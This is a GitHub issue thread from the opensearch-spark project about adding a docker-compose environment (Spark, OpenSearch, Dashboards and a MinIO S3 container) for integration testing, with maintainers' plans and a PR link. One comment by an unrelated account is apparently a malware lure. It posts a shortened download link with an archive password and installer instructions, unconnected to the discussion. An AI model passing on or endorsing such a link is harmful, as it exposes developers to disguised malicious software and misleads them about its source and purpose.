### ISSUE TITLE
[FEATURE]Add Docker-compose setting for IT testing

### ISSUE THREAD

**Issue by YANG-DB** [opensearch-project/opensearch-spark#601]
**Is your feature request related to a problem?**
Create a docker compose that will allow local IT testing using a spark + opensearch containers and being able to query spark directly using opensearch dashboard

In order to test the S3 based query acceleration capability via Spark - we can add [an S3 compatible container](https://github.com/minio/minio) to test these type of use cases.

**What solution would you like?**
Create a docker compose with the following services:
 - Spark cluster
 - OpenSearch server
 - OpenSearch dashboard server
 - S3 compatible container
 
Be able to run the OpenSearch dashboard to directly (async API) query data residing on the local file system (hadoop ?)
using a spark based datasource

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by normanj-bitquill** [comment]
@YANG-DB I wrote up some comments here:

https://github.com/opensearch-project/opensearch-spark/issues/647#issuecomment-2508715293

**Comment by normanj-bitquill** [comment]
Here is a plan for moving forward:

1. Create instructions for using Spark EMR docker image
2. Create docker files to spin up the full cluster described above (Spark, OpenSearch server, OpenSearch dashboards, and S3)
3. Create framework for integration tests to make use of the docker cluster from step 2
4. Create docker files for creating a Spark EMR cluster that is compatible with the cluster from step 2
5. Update the build so that a user can specify which type of cluster to use. This would allow testing against both standard Spark and Spark EMR. These could be done in separate CI pipeline steps.

**Comment by normanj-bitquill** [comment]
Minio can be used as an S3 compatible container.

https://hub.docker.com/r/minio/minio

**Comment by YANG-DB** [comment]
> Here is a plan for moving forward:
> 
> 1. Create instructions for using Spark EMR docker image
> 2. Create docker files to spin up the full cluster described above (Spark, OpenSearch server, OpenSearch dashboards, and S3)
> 3. Create framework for integration tests to make use of the docker cluster from step 2
> 4. Create docker files for creating a Spark EMR cluster that is compatible with the cluster from step 2
> 5. Update the build so that a user can specify which type of cluster to use. This would allow testing against both standard Spark and Spark EMR. These could be done in separate CI pipeline steps.

lets add the similar instructions for a standard spark [distribution](https://hub.docker.com/r/apache/spark)

**Comment by normanj-bitquill** [comment]
Will work through the following PRs
1. Instructions for developers to run PPL queries against Spark docker images
2. Create docker files (for standard Spark release) that will later be used for running integration tests. This will include docker containers for S3 and OpenSearch dashboards.
3. Update integration tests to run against the standard Spark docker containers (from step 2)
4. Create docker files (for Spark EMR) for running integration tests. The containers produced here must be able to work in place of the containers produced in step 2. This includes updating integration tests so the user can choose which Spark distribution to test with.

The first PR is out for review.
https://github.com/opensearch-project/opensearch-spark/pull/965
